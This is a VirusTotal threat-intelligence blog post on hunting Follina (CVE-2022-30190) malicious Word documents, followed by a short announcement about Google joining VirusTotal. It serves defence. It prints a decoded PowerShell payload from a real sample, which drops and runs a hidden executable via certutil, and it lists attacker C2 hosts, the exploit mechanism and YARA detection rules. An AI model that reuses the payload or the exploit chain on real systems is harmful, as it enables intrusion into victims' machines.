Wednesday, August 17, 2022

Hunting Follina

CVE-2022-30190 (aka Follina) is a 0-day vulnerability that was disclosed on Twitter last May 27th by the nao_sec Cyber Security Research Team. According to their announcement, this vulnerability was found in (at the time) recently uploaded sample to VirusTotal from Belarus, which suggested it was actively being exploited.

This vulnerability in Microsoft Support Diagnostic Tool (MSDT) can enable remote code execution (RCE) when MSDT is invoked using the URL protocol from a calling application, such as Microsoft Word. This, combined with the remote template feature in Microsoft Word, allows an attacker to link a document with a template containing arbitrary code to execute. This vulnerability attracted a lot of attention within the security industry, with several Follina active attacks detected shortly after details were available. 

This post provides a high level overview of all observed attacks with a focus on the ones that took place before the 0-day was publicly disclosed, and practical recommendations on how to monitor and hunt Follina samples with VirusTotal.

Initial case walkthrough

The initially reported sample was this malformed Microsoft Word document. From either the Relations or Behaviour tabs it is possible to spot the request for the remote template: 

Being docx files basically ZIP files, we can try to find the specific file inside the docx that made the request in the “Bundled Files” section within the Relations tab. Here “word/_rels/document.xml.rels” looks specially interesting, detected as suspicious by a high number of AVs. The Content tab for this XML file shows the URL to the remote template, among others.

We want to check if other files were also using this malicious template. For this, we can navigate to the URL entity and explore inside Relations/Communicating or Relations/Referrer files. We can also check if anything else was downloaded from this suspicious URL under Relations/Downloaded files or, alternatively, using Details/Body SHA-256 (which should work well for URLs returning a single file). The downloaded file is the remote template fetched by the malicious document we are analyzing.

The remote template content shows what appears to be a Base64-encoded payload. After decoding, we get the malicious Powershell script executed by the sample:

$cmd = "c:\windows\system32\cmd.exe";Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:\users\public\&&for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";

Hunting for more samples

First stage ITW documents

During this stage a lot of the effort will be on filtering out  false positives, including PoCs from researchers. To find a starting set of samples, a first approach could be pivoting on crowdsourced Yara rules detecting this exploit:

To find interesting samples, an idea could be using the first submission (fs) modifier to retrieve samples uploaded to VirusTotal before the vulnerability was published:

An alternative way to find a set of samples could be using VT Grep capabilities to search for specific Follina-content in bundled XML files:

Please note VT Grep has some limitations in the number of additional modifiers it can be used with. 

An interesting pivoting point are document properties (such as author) to get all the files created or edited by a certain person. Lots of PoCs developers use publicly disclosed documents to simply modify the address hosting the malicious remote template. For instance, the following VTI query provides a nice starting point:

We can add extra filters to the previous searches to exclude obvious PoCs, such certain file names or adding a file type filter to exclude bundled XML files. The example below uses a crowdsourced YARA rule as starting set of results and uses some of these filter ideas:

Remote templates

Searching for remote templates used by Follina samples has the advantage that we don’t need to rely on the format (docx, RTF, etc) of the first stage document. It can also be useful to discover additional documents using the same template. 

The analyzed remote template gives us ideas on what could be a right combination of file properties to search for. Interestingly, in this case the combined output of two different tools (File type identification and file’s Magic bytes) provides a first approach:

The following query will retrieve HTML documents containing Powershell scripts, which is interesting nevertheless:

This query does not rely on AV’s verdicts, thus not risking to miss something undetectable, however provides false positives (not follina-related samples). Additionally, not all Follina remote templates get indexed as HTML documents. Another approach could use VT Grep for Powershell scripts including a call to MSDT:

Another variant of this idea omits the Powershell tag and relies only on file content. The size keyword is used as an additional filter based on the size of the discovered remote templates:

This last approach is quite similar to a classic YARA hunting which we could use in Livehunt and Retrohunt services. Examples of generic YARA rules are provided at the end of this post.

Our findings

Even though most of the samples available in VirusTotal were already covered by security vendors (like Malwarebytes, Proofpoint etc), we wanted to summarize them all together along with our own findings.

We started by getting all documents containing references to remote Html templates ending with exclamation marks (“html!” or “htm!”) and then we divided them into two groups: submitted before and submitted after the public vulnerability disclosure.

Before the disclosure

We only found 10 samples submitted to VirusTotal before May 28th. At least a few of them (below) look like PoCs created before the public disclosure and the first observed in-the-wild attack, which is interesting:

SHA-1
Remote template
Submitter’s country
First submission date
hxxps://127.0.0[.]1/testtesttest.html

Brazil

2021-10-21

hxxp://127.0.0[.]1/testtesttest.html

Argentina

2021-10-21

hxxp://asdasdas[.]com/e8c76295a5f9acb7/side.html

Hong Kong

2021-09-09

hxxp://caribarena[.]com/e8c76295a5f9acb7/side.html

Hong Kong

2021-09-09

Follina exploit implementations share similarities with CVE-2021-40444 (RCE in Microsoft MSHTML), using a similar approach to fetch a remote template from an XML Relationship file. Follina’s payloads are located in the remote template, making it necessary to analyze the remote payload for ful visibility of the attack. 


And the following are two of the remote templates used by some of the previous samples:

Some evidence, including pdns history and public email addresses, seem to indicate that one of the domains hosting a payload might be a compromised legitimate server. A second sample (in the “After the disclosure” set described below) also seems to abuse a compromised domain.

After the disclosure

To exclude PoCs from actual attacks, we filtered out samples using obvious names (like “follina.doc”, “poc.docx”, “test”, etc) as well as samples using local, non-existing C2 addresses or previously known C2 addresses (to avoid slightly modified resubmissions).

We found a set of samples reusing a single initially disclosed blank document and replacing the C2 with their own:

SHA-1
Remote template
Submitter’s country
First submission date
http://93.115.26[.]76:8000/index.html

Pakistan

2022-06-02

http://68.183.36[.]18:8000/index.html

Ethiopia

2022-06-01 

https://708b-27-122-14-41.ap.ngrok[.]io/index.html

Vietnam

2022-05-31 

https://www.cssformats[.]com/o/SDS84Sl.html

Germany

2022-05-30

In some cases, attackers implemented their own malformed document with specific spear phishing content.

This document document mimics an invitation to Doha Expo in Qatar and requests a remote template hosted at files[.]attend-doha-expo[.]com. Its parent domain was registered right after the exploit's public disclosure. However, subdomain’s pdns seem to indicate it was only available between May 30th to June 1st, probably the domain was timely taken down.

A second document named جدري القردة.docx (“Monkeypox.docx”) was uploaded from Saudi Arabia and looks like a Monkeypox virus warning issued by the Saudi Ministry of Health. It requests a remote template hosted at 212.138.130[.]8 which does not seem to be available since June 2nd. Like in the previous case, it was available for a really short period of time.

Conclusions

Used to weaponize first-stage documents to set a foot in the victim, Follina is an example of a vulnerability well worth monitoring. The retrospective analysis provides insights on for how long this vulnerability has been abused before being identified. Continuous monitoring helps identify additional indicators and avoid attacks against our organization, but most importantly, learn how attacks evolve and what kind of malware they are using. Threat intelligence should be actionable.

We provided several ideas on how you can use VirusTotal to hunt for new samples to discover new variations of this attack, which could be reused for any other campaign you would like to monitor in your Threat Hunter journey. As always, we are happy to hear any additional techniques you would like to share with us

Happy hunting!

IOCs

Please note that despite our filtering efforts still there could be some PoCs/False Positives samples

Collections: 

We are constantly tracking unseen samples of Follina exploitation and doing our best to filter out all the irrelevant ones. Interestingly, we detected Discord being abused to host Follina remote templates. Here is a list with some of the latest observations:

Example Yara rules for hunting
rule CVE_2022_30190_remote_template {
   meta:
      author = "Alexey Firsh"
      date = "2022-06-01"
      hash = "8e986c906d0c6213f80d0224833913fa14bc4c15c047766a62f6329bfc0639bd"
      
   strings:
      $s1 = "ms-msdt:" fullword ascii
      $s2 = "location.href" fullword ascii
    
   condition:
      filesize < 100KB
      and all of ($s*)
}

rule CVE_2022_30190 {
   meta:
      author = "Alexey Firsh"
      date = "2022-06-01"
      reference = "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e"
      hash = "62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0"
      
   strings:
      $t1 = "TargetMode='External'" fullword ascii
      $t2 = "TargetMode=\"External\"" fullword ascii
      
      $r1 = "<Relationship" fullword ascii

      $h1 = ".html!\"" ascii
      $h2 = ".html!'" ascii
      $h3 = ".htm!\"" ascii
      $h4 = ".htm!'" ascii
      
   condition:
      filesize < 100KB
      and any of ($t*)
      and $r1
      and any of ($h*)

}


Wednesday, August 10, 2022

VirusTotal += Google

Today, we are happy to announce that in addition to Google's URL scanning service (Safe Browsing), which has been integrated with VirusTotal, Google is now also providing a file scanning service to the VirusTotal community. In their own words:

"Google protects billions of users every day through its advanced threat detection and security capabilities. This integration with VirusTotal is one of multiple detection layers from Google to protect its users from malware and other malicious files."

Google has expressed its commitment to follow the recommendations of AMTSO and, in compliance with our policy, facilitates this review by AV-Comparatives, an AMTSO-member tester.